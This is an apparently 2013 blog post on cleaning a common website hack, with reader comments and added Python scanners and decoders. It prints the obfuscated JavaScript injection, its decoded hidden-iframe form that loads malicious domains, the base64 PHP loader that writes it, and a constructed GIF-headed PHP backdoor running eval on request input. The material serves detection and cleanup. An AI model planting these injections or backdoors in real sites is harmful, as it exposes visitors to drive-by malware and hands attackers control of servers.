Wednesday, January 2, 2013

Malicious software hosted on donationwarecallers.info, hubsilver.info, samplesstimulate.info and/or pphoenix.org, fepawctes.myfw.us, zqruajfsgir.myfw.us, firingwaterway.org

This is a VERY common hack I am seeing currently.  It is a JavaScript injection: a block of obfuscated script is inserted into the pages of the site.  The block of script looks something like this:

/*c0d5075664ac5fed12fe77bd59d6fd3b*/try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o", "4d", "46", "3l", "4c", "41", "47", "46", "16", "3p", "4a", "3j", "1e", "3j", "1i", "3k", "1f", "4j", "4a", "3n", "4c", "4d", "4a", "46", "16", "2p", "3j", "4c", "40", "1k", "3o", "44", "47", "47", "4a", "1e", "2p", "3j", "4c", "40", "1k", "4a", "3j", "46", "3m", "47", "45", "1e", "1f", "1g", "1e", "3k", "1j", "3j", "1h", "1n", "1f", "1f", "1h", "3j", "27", "4l", "d", "a", "3o", "4d", "46", "3l", "4c", "41", "47", "46", "16", "4a", "4b", "1e", "1f", "4j", "4a", "3n", "4c", "4d", "4a", "46", "16", "2p", "3j", "4c", "40", "1k", "4a", "3j", "46", "3m", "47", "45", "1e", "1f", "1k", "4c", "47", "35", "4c", "4a", "41", "46", "3p", "1e", "1p", "22", "1f", "1k", "4b", "4d", "3k", "4b", "4c", "4a", "41", "46", "3p", "1e", "21", "1f", "27", "4l", "d", "a", "41", "3o", "1e", "46", "3j", "4e", "41", "3p", "3j", "4c", "47", "4a", "1k", "3l", "47", "47", "43", "41", "3n", "2h", "46", "3j", "3k", "44", "3n", "3m", "16", "1c", "1c", "16", "3m", "47", "3l", "4d", "45", "3n", "46", "4c", "1k", "3l", "47", "47", "43", "41", "3n", "1k", "41", "46", "3m", "3n", "4g", "31", "3o", "1e", "1d", "4c", "3n", "4b", "4c", "3l", "47", "47", "43", "41", "3n", "1n", "29", "1d", "1f", "29", "29", "1j", "1n", "1f", "4j", "d", "a", "9", "4e", "3j", "4a", "16", "4b", "4c", "46", "45", "29", "4a", "4b", "1e", "1f", "27", "d", "a", "9", "3m", "47", "3l", "4d", "45", "3n", "46", "4c", "1k", "4f", "4a", "41", "4c", "3n", "1e", "1d", "28", "4b", "4c", "4h", "44", "3n", "2a", "1k", "4b", "1d", "1h", "4b", "4c", "46", "45", "1h", "1d", "16", "4j", "16", "48", "47", "4b", "41", "4c", "41", "47", "46", "26", "3j", "3k", "4b", "47", "44", "4d", "4c", "3n", "27", "16", "44", "3n", "3o", "4c", "26", "1j", "1d", "1h", "3p", "4a", "3j", 
"1e", "22", "1m", "1m", "1i", "1n", "1m", "1m", "1m", "1f", "1h", "1d", "48", "4g", "27", "16", "4c", "47", "48", "26", "1j", "1d", "1h", "3p", "4a", "3j", "1e", "22", "1m", "1m", "1i", "1n", "1m", "1m", "1m", "1f", "1h", "1d", "48", "4g", "27", "16", "4l", "28", "1l", "4b", "4c", "4h", "44", "3n", "2a", "16", "28", "3m", "41", "4e", "16", "3l", "44", "3j", "4b", "4b", "29", "18", "4b", "1d", "1h", "4b", "4c", "46", "45", "1h", "1d", "18", "2a", "28", "41", "3o", "4a", "3j", "45", "3n", "16", "4b", "4a", "3l", "29", "18", "40", "4c", "4c", "48", "26", "1l", "1l", "3o", "41", "4a", "41", "46", "3p", "4f", "3j", "4c", "3n", "4a", "4f", "3j", "4h", "1k", "47", "4a", "3p", "1l", "3j", "3m", "1l", "3o", "3n", "3n", "3m", "1k", "48", "40", "48", "18", "16", "4f", "41", "3m", "4c", "40", "29", "18", "1d", "1h", "3p", "4a", "3j", "1e", "1p", "1m", "1m", "1i", "22", "1m", "1m", "1f", "1h", "1d", "18", "16", "40", "3n", "41", "3p", "40", "4c", "29", "18", "1d", "1h", "3p", "4a", "3j", "1e", "1p", "1m", "1m", "1i", "22", "1m", "1m", "1f", "1h", "1d", "18", "2a", "28", "1l", "41", "3o", "4a", "3j", "45", "3n", "2a", "28", "1l", "3m", "41", "4e", "2a", "1d", "1f", "27", "d", "a", "9", "4e", "3j", "4a", "16", "3n", "4g", "48", "29", "46", "3n", "4f", "16", "2g", "3j", "4c", "3n", "1e", "1f", "27", "3n", "4g", "48", "1k", "4b", "3n", "4c", "2g", "3j", "4c", "3n", "1e", "3n", "4g", "48", "1k", "3p", "3n", "4c", "2g", "3j", "4c", "3n", "1e", "1f", "1h", "23", "1f", "27", "d", "a", "9", "3m", "47", "3l", "4d", "45", "3n", "46", "4c", "1k", "3l", "47", "47", "43", "41", "3n", "29", "1d", "4c", "3n", "4b", "4c", "3l", "47", "47", "43", "41", "3n", "1n", "29", "1d", "1h", "4a", "4b", "1e", "1f", "1h", "1d", "27", "16", "3n", "4g", "48", "41", "4a", "3n", "4b", "29", "1d", "1h", "3n", "4g", "48", "1k", "4c", "47", "2j", "2p", "36", "35", "4c", "4a", "41", "46", "3p", "1e", "1f", "27", "d", "a", "4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=
String.fromCharCode(parseInt(n[i], 26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}/*c0d5075664ac5fed12fe77bd59d6fd3b*/

which de-obfuscates to something like the code below.  The try/catch scaffolding around the array is just noise: the payload is the n[] array, each entry a character code written in base 26, and the loop at the end turns it back into text with parseInt(n[i], 26) and String.fromCharCode and hands the result to window["eval"] (that is what ww["e"+vl] is).  The domain in the iframe varies from sample to sample; the particular array above decodes to an iframe pointing at http://firingwaterway.org/ad/feed.php.

function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}   // random integer between a and b
function rs(){return Math.random().toString(36).substring(5);}   // random string for the class name and cookie value
if(navigator.cookieEnabled && document.cookie.indexOf('testcookie1=')==-1){
  var stnm=rs();
  // the iframe is pushed off-screen by a random negative offset, so the visitor sees nothing
  document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://donationwarecallers.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
  // a 7-day cookie makes sure the same browser is only served the iframe once
  var exp=new Date();exp.setDate(exp.getDate()+7);
  document.cookie='testcookie1='+rs()+'; expires='+exp.toGMTString();
}

The hex string in the comment tags that bracket the block (/*c0d5075664ac5fed12fe77bd59d6fd3b*/ here) varies from site to site, so when you search your files look for the pattern (a /* */ comment holding 32 hex characters, followed by try{document["b"+"ody"]) rather than for this exact value.

In the majority of the sites I have looked at, the malicious script has been appended to the end of multiple JavaScript files on the site.  In the last couple of days I have started to see sites where the code is inserted at the top of the homepage and most of the other PHP pages on the site.



On sites where the code is inserted at the top of the pages, the code is being "first-click cloaked".  Site owners have found a file in the root directory, with a random filename, that contains a list of IP addresses.  The injected PHP checks whether the requesting IP address is already in that file; if it is not, it inserts the malicious code into the page and then writes the IP address into the file.  So if you use the File Viewer Tool to request your homepage or one of your other PHP pages you will see the code the first time you request the page, BUT you will most likely not see it if you request the page again from the same address.  Do not take a clean second fetch as proof the site is clean: fetch from a different IP address, or look for the IP list file itself.

If you see the code in your JavaScript files you will need to edit the files and remove the malicious block of script.  If you see the malicious script at the beginning of your homepage or your PHP files, then the block of script is being written by obfuscated PHP code (base64_decode stuff), either in the homepage such as index.php and/or in one or more of your common files.  Typically it will be in your active theme or one of your modules.  Check files like header.php and index2.php.  If you are not able to locate the infected files, try the script at Simple script to find base64_decode in your files and see whether it turns up anything.

I am seeing some indications that site owners are cleaning up their js files and within a few hours the code is being added back, but I have no confirmation of this.  At any rate I suggest you closely monitor the js files for a while.  If you do find the malicious code is being re-written, work through the tips in the yellow block at the end of this post.
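An added example, not code from this post: a Python scanner that walks a site tree and flags the three on-disk artifacts described above, the marker-bracketed JavaScript block, the eval/echo(base64_decode('...')) loader, and a file that holds nothing but IP addresses (the cloaking list). The sample tree it builds is constructed for the demonstration and every file name in it is hypothetical; the marker regex assumes the block's prologue stays exactly as shown above, so a variant would need its own pattern. Review every ip_list hit by hand, since a legitimate allow list looks the same.

```python
import os
import re
import tempfile

# The injected JS block opens with a 32-hex comment marker and the try{document["b"+"ody"] prologue.
JS_MARKER_RE = re.compile(r'/\*([0-9a-f]{32})\*/\s*try\{document\["b"\+"ody"\]')
# The PHP side is eval or echo wrapped around base64_decode('...').
PHP_LOADER_RE = re.compile(r'\b(eval|echo)\s*\(\s*base64_decode\s*\(')
# The first-click cloaking list is a random-named file containing only IPv4 addresses.
IPV4_RE = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}$')


def count_ip_list(data):
    """Number of IPv4 addresses if the file holds nothing but addresses, otherwise 0."""
    tokens = [t for t in re.split(r'[\s,;|]+', data) if t]
    if tokens and all(IPV4_RE.match(t) for t in tokens):
        return len(tokens)
    return 0


def scan_file(path):
    """Return (indicator, detail) findings for one file; an empty list means nothing matched."""
    findings = []
    try:
        with open(path, 'r', encoding='utf-8', errors='replace') as fh:
            data = fh.read()
    except OSError:
        return findings
    m = JS_MARKER_RE.search(data)
    if m:
        findings.append(('injected_js', m.group(1)))   # detail: the per-site marker hash
    m = PHP_LOADER_RE.search(data)
    if m:
        findings.append(('php_loader', m.group(1)))    # detail: eval or echo
    n = count_ip_list(data)
    if n:
        findings.append(('ip_list', n))                # detail: how many addresses
    return findings


def scan_tree(root):
    """Map relative path -> findings for every flagged file under root."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            found = scan_file(full)
            if found:
                hits[os.path.relpath(full, root).replace(os.sep, '/')] = found
    return hits


# Constructed sample tree (hypothetical names, not from any real site). The infected JS
# file carries the marker and prologue quoted above, truncated after the first catch.
SAMPLE_FILES = {
    'js/jquery.min.js': 'function $(){return 1;}\n',
    'js/app.js': ('var a=1;\n'
                  '/*c0d5075664ac5fed12fe77bd59d6fd3b*/try{document["b"+"ody"]*=document}'
                  'catch(dgsgsdg){zxc=1;ww=window;}/*c0d5075664ac5fed12fe77bd59d6fd3b*/\n'),
    'wp-content/themes/x/header.php':
        "<?php echo(base64_decode('dHJ5e2RvY3VtZW50WyJiIisib2R5Il0qPWRvY3VtZW50')); ?>\n",
    'index.php': '<?php echo "hello"; ?>\n',
    'x7q2kd': '203.0.113.5\n198.51.100.7\n',
}


def build_sample_site():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix='site-')
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='utf-8') as fh:
            fh.write(body)
    return root


if __name__ == '__main__':
    for path, found in sorted(scan_tree(build_sample_site()).items()):
        print(path, found)
```

Run it against the document root of the site instead of the constructed tree; js files hit on injected_js, theme or module files hit on php_loader, and a bare IP list in the root is the cloaking file the post describes.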

This is an example of the obfuscated PHP code.  The code will start with eval or echo, followed by (base64_decode(' and a long string of seemingly random characters.  The characters will vary depending on the value of the comment tag and the malicious domain being used; the string below decodes to the same JavaScript as the block shown at the top of this post.  Because the decoded text is JavaScript to be written into the page, echo is the form that makes sense for this stage; eval(base64_decode(...)) is the same trick used to run hidden PHP, which is how the backdoor described in the comments works.

eval or echo(base64_decode ('dHJ5e2RvY3VtZW50WyJiIisib2R5Il0qPWRvY3VtZW50fWNhdG
NoKGRnc2dzZGcpe3p4Yz0xO3d3PXdpbmRvdzt9dHJ5e2Q9ZG9jdW1lbnRbImNyZWF
0ZUVsZW1lbnQiXSgic3BhbiIpO31jYXRjaChhZ2RzZyl7enhjPTA7fXRyeXtpZih3dy5kb2
N1bWVudCl3aW5kb3dbImRvYyIrInVtZW50Il1bImJvZHkiXT0ienhjIn1jYXRjaChiYXdldG
F3ZSl7aWYod3cuZG9jdW1lbnQpe3Y9d2luZG93O249WyIzbyIsIjRkIiwiNDYiLCIzbCIsIj
RjIiwiNDEiLCI0NyIsIjQ2IiwiMTYiLCIzcCIsIjRhIiwiM2oiLCIxZSIsIjNqIiwiMWkiLCIzayIsIj
FmIiwiNGoiLCI0YSIsIjNuIiwiNGMiLCI0ZCIsIjRhIiwiNDYiLCIxNiIsIjJwIiwiM2oiLCI0YyIs
IjQwIiwiMWsiLCIzbyIsIjQ0IiwiNDciLCI0NyIsIjRhIiwiMWUiLCIycCIsIjNqIiwiNGMiLCI0M
CIsIjFrIiwiNGEiLCIzaiIsIjQ2IiwiM20iLCI0NyIsIjQ1IiwiMWUiLCIxZiIsIjFnIiwiMWUiLCIza
yIsIjFqIiwiM2oiLCIxaCIsIjFuIiwiMWYiLCIxZiIsIjFoIiwiM2oiLCIyNyIsIjRsIiwiZCIsImEiLC
IzbyIsIjRkIiwiNDYiLCIzbCIsIjRjIiwiNDEiLCI0NyIsIjQ2IiwiMTYiLCI0YSIsIjRiIiwiMWUiLC
IxZiIsIjRqIiwiNGEiLCIzbiIsIjRjIiwiNGQiLCI0YSIsIjQ2IiwiMTYiLCIycCIsIjNqIiwiNGMiLCI
0MCIsIjFrIiwiNGEiLCIzaiIsIjQ2IiwiM20iLCI0NyIsIjQ1IiwiMWUiLCIxZiIsIjFrIiwiNGMiLCI0
NyIsIjM1IiwiNGMiLCI0YSIsIjQxIiwiNDYiLCIzcCIsIjFlIiwiMXAiLCIyMiIsIjFmIiwiMWsiLCI
0YiIsIjRkIiwiM2siLCI0YiIsIjRjIiwiNGEiLCI0MSIsIjQ2IiwiM3AiLCIxZSIsIjIxIiwiMWYiLCIy
NyIsIjRsIiwiZCIsImEiLCI0MSIsIjNvIiwiMWUiLCI0NiIsIjNqIiwiNGUiLCI0MSIsIjNwIiwiM2
oiLCI0YyIsIjQ3IiwiNGEiLCIxayIsIjNsIiwiNDciLCI0NyIsIjQzIiwiNDEiLCIzbiIsIjJoIiwiNDY
iLCIzaiIsIjNrIiwiNDQiLCIzbiIsIjNtIiwiMTYiLCIxYyIsIjFjIiwiMTYiLCIzbSIsIjQ3IiwiM2wiLC
I0ZCIsIjQ1IiwiM24iLCI0NiIsIjRjIiwiMWsiLCIzbCIsIjQ3IiwiNDciLCI0MyIsIjQxIiwiM24iLC
IxayIsIjQxIiwiNDYiLCIzbSIsIjNuIiwiNGciLCIzMSIsIjNvIiwiMWUiLCIxZCIsIjRjIiwiM24iLC
I0YiIsIjRjIiwiM2wiLCI0NyIsIjQ3IiwiNDMiLCI0MSIsIjNuIiwiMW4iLCIyOSIsIjFkIiwiMWYiL
CIyOSIsIjI5IiwiMWoiLCIxbiIsIjFmIiwiNGoiLCJkIiwiYSIsIjkiLCI0ZSIsIjNqIiwiNGEiLCIxN
iIsIjRiIiwiNGMiLCI0NiIsIjQ1IiwiMjkiLCI0YSIsIjRiIiwiMWUiLCIxZiIsIjI3IiwiZCIsImEiLCI5
IiwiM20iLCI0NyIsIjNsIiwiNGQiLCI0NSIsIjNuIiwiNDYiLCI0YyIsIjFrIiwiNGYiLCI0YSIsIjQ
xIiwiNGMiLCIzbiIsIjFlIiwiMWQiLCIyOCIsIjRiIiwiNGMiLCI0aCIsIjQ0IiwiM24iLCIyYSIsIj
FrIiwiNGIiLCIxZCIsIjFoIiwiNGIiLCI0YyIsIjQ2IiwiNDUiLCIxaCIsIjFkIiwiMTYiLCI0aiIsIjE2
IiwiNDgiLCI0NyIsIjRiIiwiNDEiLCI0YyIsIjQxIiwiNDciLCI0NiIsIjI2IiwiM2oiLCIzayIsIjRiIiwi
NDciLCI0NCIsIjRkIiwiNGMiLCIzbiIsIjI3IiwiMTYiLCI0NCIsIjNuIiwiM28iLCI0YyIsIjI2Iiwi
MWoiLCIxZCIsIjFoIiwiM3AiLCI0YSIsIjNqIiwiMWUiLCIyMiIsIjFtIiwiMW0iLCIxaSIsIjFuI
iwiMW0iLCIxbSIsIjFtIiwiMWYiLCIxaCIsIjFkIiwiNDgiLCI0ZyIsIjI3IiwiMTYiLCI0YyIsIjQ3
IiwiNDgiLCIyNiIsIjFqIiwiMWQiLCIxaCIsIjNwIiwiNGEiLCIzaiIsIjFlIiwiMjIiLCIxbSIsIjFtIi
wiMWkiLCIxbiIsIjFtIiwiMW0iLCIxbSIsIjFmIiwiMWgiLCIxZCIsIjQ4IiwiNGciLCIyNyIsIjE
2IiwiNGwiLCIyOCIsIjFsIiwiNGIiLCI0YyIsIjRoIiwiNDQiLCIzbiIsIjJhIiwiMTYiLCIyOCIsIj
NtIiwiNDEiLCI0ZSIsIjE2IiwiM2wiLCI0NCIsIjNqIiwiNGIiLCI0YiIsIjI5IiwiMTgiLCI0YiIsIjF
kIiwiMWgiLCI0YiIsIjRjIiwiNDYiLCI0NSIsIjFoIiwiMWQiLCIxOCIsIjJhIiwiMjgiLCI0MSIs
IjNvIiwiNGEiLCIzaiIsIjQ1IiwiM24iLCIxNiIsIjRiIiwiNGEiLCIzbCIsIjI5IiwiMTgiLCI0MCIsI
jRjIiwiNGMiLCI0OCIsIjI2IiwiMWwiLCIxbCIsIjNvIiwiNDEiLCI0YSIsIjQxIiwiNDYiLCIzcC
IsIjRmIiwiM2oiLCI0YyIsIjNuIiwiNGEiLCI0ZiIsIjNqIiwiNGgiLCIxayIsIjQ3IiwiNGEiLCIzcC
IsIjFsIiwiM2oiLCIzbSIsIjFsIiwiM28iLCIzbiIsIjNuIiwiM20iLCIxayIsIjQ4IiwiNDAiLCI0OCIs
IjE4IiwiMTYiLCI0ZiIsIjQxIiwiM20iLCI0YyIsIjQwIiwiMjkiLCIxOCIsIjFkIiwiMWgiLCIzcCIs
IjRhIiwiM2oiLCIxZSIsIjFwIiwiMW0iLCIxbSIsIjFpIiwiMjIiLCIxbSIsIjFtIiwiMWYiLCIxaCIs
IjFkIiwiMTgiLCIxNiIsIjQwIiwiM24iLCI0MSIsIjNwIiwiNDAiLCI0YyIsIjI5IiwiMTgiLCIxZCI
sIjFoIiwiM3AiLCI0YSIsIjNqIiwiMWUiLCIxcCIsIjFtIiwiMW0iLCIxaSIsIjIyIiwiMW0iLCIxb
SIsIjFmIiwiMWgiLCIxZCIsIjE4IiwiMmEiLCIyOCIsIjFsIiwiNDEiLCIzbyIsIjRhIiwiM2oiLC
I0NSIsIjNuIiwiMmEiLCIyOCIsIjFsIiwiM20iLCI0MSIsIjRlIiwiMmEiLCIxZCIsIjFmIiwiMjci
LCJkIiwiYSIsIjkiLCI0ZSIsIjNqIiwiNGEiLCIxNiIsIjNuIiwiNGciLCI0OCIsIjI5IiwiNDYiLCIz
biIsIjRmIiwiMTYiLCIyZyIsIjNqIiwiNGMiLCIzbiIsIjFlIiwiMWYiLCIyNyIsIjNuIiwiNGciLCI0
OCIsIjFrIiwiNGIiLCIzbiIsIjRjIiwiMmciLCIzaiIsIjRjIiwiM24iLCIxZSIsIjNuIiwiNGciLCI0OC
IsIjFrIiwiM3AiLCIzbiIsIjRjIiwiMmciLCIzaiIsIjRjIiwiM24iLCIxZSIsIjFmIiwiMWgiLCIyMyIs
IjFmIiwiMjciLCJkIiwiYSIsIjkiLCIzbSIsIjQ3IiwiM2wiLCI0ZCIsIjQ1IiwiM24iLCI0NiIsIjRjIi
wiMWsiLCIzbCIsIjQ3IiwiNDciLCI0MyIsIjQxIiwiM24iLCIyOSIsIjFkIiwiNGMiLCIzbiIsIjR
iIiwiNGMiLCIzbCIsIjQ3IiwiNDciLCI0MyIsIjQxIiwiM24iLCIxbiIsIjI5IiwiMWQiLCIxaCIsIj
RhIiwiNGIiLCIxZSIsIjFmIiwiMWgiLCIxZCIsIjI3IiwiMTYiLCIzbiIsIjRnIiwiNDgiLCI0MSI
sIjRhIiwiM24iLCI0YiIsIjI5IiwiMWQiLCIxaCIsIjNuIiwiNGciLCI0OCIsIjFrIiwiNGMiLCI0N
yIsIjJqIiwiMnAiLCIzNiIsIjM1IiwiNGMiLCI0YSIsIjQxIiwiNDYiLCIzcCIsIjFlIiwiMWYiLCIy
NyIsImQiLCJhIiwiNGwiXTtoPTI7cz0iIjtpZih6eGMpe2ZvcihpPTA7aS02MDkhPTA7aS
srKXtrPWk7cys9U3RyaW5nLmZyb21DaGFyQ29kZShwYXJzZUludChuW2ldLDI2KS
k7fXo9czt2bD0idmFsIjtpZih3dy5kb2N1bWVudCl3d1siZSIrdmxdKHopfX19');


If you are unsure about any base64 stuff you find, try plugging it into the Base64 Decoder.  In most cases, once it has been decoded, you will be able to get a good idea of what the code is doing.
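A decoder for both layers shown on this page, added here as an example rather than the author's tool: it peels eval/echo(base64_decode('...')) (ignoring the line wrapping the blog adds to the base64 string), then reverses the parseInt(n[i], 26) + String.fromCharCode loop. The sample it decodes is constructed in the block with the same encoding the malware uses, so a successful round trip proves the decoder; the radix is read from the parseInt call and falls back to 26, which is what the sample on this page uses.

```python
import base64
import re

# Layer 1 (PHP): eval(base64_decode('...')) or echo(base64_decode('...')); whitespace inside
# the quoted string is tolerated because the post wraps it over many lines.
PHP_B64_RE = re.compile(r"(?:eval|echo)\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]+)'")
# Layer 2 (JS): n=["3o", "4d", ...] fed through String.fromCharCode(parseInt(n[i], RADIX)).
ARRAY_RE = re.compile(r'\bn\s*=\s*\[([^\]]*)\]')
RADIX_RE = re.compile(r'parseInt\(\s*n\[i\]\s*,\s*(\d+)\s*\)')
DIGITS = '0123456789abcdefghijklmnopqrstuvwxyz'


def peel_php_layer(src):
    """Return the text hidden in eval/echo(base64_decode('...')), or None if absent."""
    m = PHP_B64_RE.search(src)
    if not m:
        return None
    return base64.b64decode(re.sub(r'\s+', '', m.group(1))).decode('latin-1')


def decode_js_array(js):
    """Reverse the parseInt(n[i], radix) + fromCharCode loop; None if there is no n=[...]."""
    m = ARRAY_RE.search(js)
    if not m:
        return None
    radix_m = RADIX_RE.search(js)
    radix = int(radix_m.group(1)) if radix_m else 26
    digits = re.findall(r'"([0-9a-z]+)"', m.group(1))
    return ''.join(chr(int(d, radix)) for d in digits)


def decode_injection(src):
    """Peel the PHP layer if present, then the JS layer, and return the clear payload."""
    js = peel_php_layer(src)
    return decode_js_array(src if js is None else js)


def encode_js_array(payload, radix=26):
    """Build the same kind of array the malware uses (only to construct the sample below)."""
    def to_base(n):
        out = ''
        while n:
            out, n = DIGITS[n % radix] + out, n // radix
        return out or '0'
    return ', '.join('"%s"' % to_base(ord(c)) for c in payload)


# Constructed sample: the prologue from the post, a short payload encoded the same way,
# and the whole thing wrapped in the PHP loader as it would sit in a theme file.
SAMPLE_PAYLOAD = ("document.write('<iframe src=\"http://donationwarecallers.info/ad/feed.php\">"
                  "</iframe>');")
SAMPLE_JS = (
    'try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}'
    'if(ww.document){v=window;n=[%s];s="";'
    'for(i=0;i-%d!=0;i++){s+=String.fromCharCode(parseInt(n[i], 26));}'
    'ww["e"+"val"](s)}'
) % (encode_js_array(SAMPLE_PAYLOAD), len(SAMPLE_PAYLOAD))
SAMPLE_PHP = "<?php echo(base64_decode('%s')); ?>" % base64.b64encode(SAMPLE_JS.encode()).decode()


if __name__ == '__main__':
    print(decode_injection(SAMPLE_PHP))
```

Paste the eval/echo line from an infected file, or the JavaScript block from an infected js file, into decode_injection; the returned text is what actually runs in the visitor's browser, and the iframe URL in it is what to report and block.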

6 comments:

  1. Do you know how the script affected users who visited the sites before they were blocked by Google?

  2. This is happening to many of our sites and each time they are cleaned the code returns shortly. Any idea on how to prevent this?

  3. ?? I have seen that on a couple of sites but have not received any feedback from site owners on how it is being done!

    If you have not done so suggest you start with the basic security stuff - scan your computer, change all passwords, if you are on WordPress change Security/Secret keys. Check file/folder permissions.

    Check your site for a backdoor. There is an article with some tips at

    http://25yearsofprogramming.com/blog/2010/20100315.htm

  4. I have been having this problem with a couple of sites I run. The attack for us is not coming from FTP or SSH connections. We are pretty sure it's coming from a compromised WordPress plugin or file. The recent attacks have switched to using this url http://unzippingopentype.org/ad/feed.php for the iframe.

    So far the attacks seem to come every 6 hours or so.

  5. This script is being injected via back door--in my case a binary file called external_[HASH].php in a theme cache directory (where [HASH] looks like an md5 hash). The binary file has a GIF header but php extension and PHP payload with two or three layers of obfuscation (base64_decodes of base64_decodes with /*[random string]*/ comments all over the place--after you peel everything back it's a very basic back door that evals any requests when a certain request variable is set. All of the PHP and JS injections stem from there.

    Replies
    1. Thanks VERY MUCH, Really appreciate the feedback!

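An added example prompted by the last comment above, not code from the commenter or the post: a Python check for the backdoor shape described there, a file with a .php extension that starts with an image header and hides eval(...) under nested base64_decode layers padded with /*...*/ comments. The theme cache directory, the external_<hash>.php name and the payload are constructed for the demonstration and are hypothetical; only the shape is taken from the comment.

```python
import base64
import os
import re
import tempfile

# Image magic a PHP file has no business starting with (the comment mentions a GIF header;
# PNG and JPEG are added on the same reasoning).
IMAGE_MAGIC = (b'GIF87a', b'GIF89a', b'\x89PNG\r\n\x1a\n', b'\xff\xd8\xff')
COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
B64_CALL_RE = re.compile(r"base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]*)'\s*\)")
SUSPICIOUS_RE = re.compile(r'\beval\s*\(|\$_(?:REQUEST|POST|GET|COOKIE)\b')


def peel_layers(php_src, max_layers=10):
    """Drop /*...*/ filler and unwrap nested base64_decode('...') calls until none remain.
    Returns (clear_text, layers_peeled)."""
    text = COMMENT_RE.sub('', php_src)
    layers = 0
    while layers < max_layers:
        m = B64_CALL_RE.search(text)
        if m is None:
            break
        try:
            inner = base64.b64decode(re.sub(r'\s+', '', m.group(1)), validate=True)
        except ValueError:          # binascii.Error is a ValueError: not base64 after all
            break
        text = COMMENT_RE.sub('', inner.decode('latin-1'))
        layers += 1
    return text, layers


def inspect_php(path):
    """Findings for one .php file: image magic at offset 0, base64 layers, eval/request use."""
    with open(path, 'rb') as fh:
        raw = fh.read()
    clear, layers = peel_layers(raw.decode('latin-1'))
    return {
        'image_header': raw.startswith(IMAGE_MAGIC),
        'b64_layers': layers,
        'eval_or_request': SUSPICIOUS_RE.search(clear) is not None,
    }


def find_backdoors(root):
    """Relative path -> findings for .php files that carry an image header or base64 layers."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith('.php'):
                continue
            full = os.path.join(dirpath, name)
            found = inspect_php(full)
            if found['image_header'] or found['b64_layers']:
                hits[os.path.relpath(full, root).replace(os.sep, '/')] = found
    return hits


def build_sample_tree():
    """Constructed layout (hypothetical names): a clean theme file, a real-looking GIF, and a
    polyglot in the cache directory built the way the comment describes: GIF header, .php
    extension, two base64 layers with comment noise, and a request-driven eval at the core."""
    root = tempfile.mkdtemp(prefix='theme-')
    stage2 = "if(isset($_REQUEST['k'])){eval($_REQUEST['k']);}"
    stage1 = "/*f8h2*/eval(/*qq*/base64_decode('%s')/*z*/);" % base64.b64encode(stage2.encode()).decode()
    polyglot = ("GIF89a\x01\x00\x01\x00\n<?php /*k1*/eval(base64_decode('%s')); ?>"
                % base64.b64encode(stage1.encode()).decode())
    files = {
        'functions.php': "<?php function theme_setup(){ return true; } ?>\n",
        'cache/spinner.gif': 'GIF89a\x01\x00\x01\x00',
        'cache/external_0123456789abcdef0123456789abcdef.php': polyglot,
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='latin-1') as fh:
            fh.write(body)
    return root


if __name__ == '__main__':
    for path, found in sorted(find_backdoors(build_sample_tree()).items()):
        print(path, found)
```

Point find_backdoors at the theme or plugin directory; a hit with image_header set is a file that should never have been served as PHP, and the clear text returned by peel_layers is what to read to confirm it is the eval-on-request backdoor rather than an obfuscated but legitimate library.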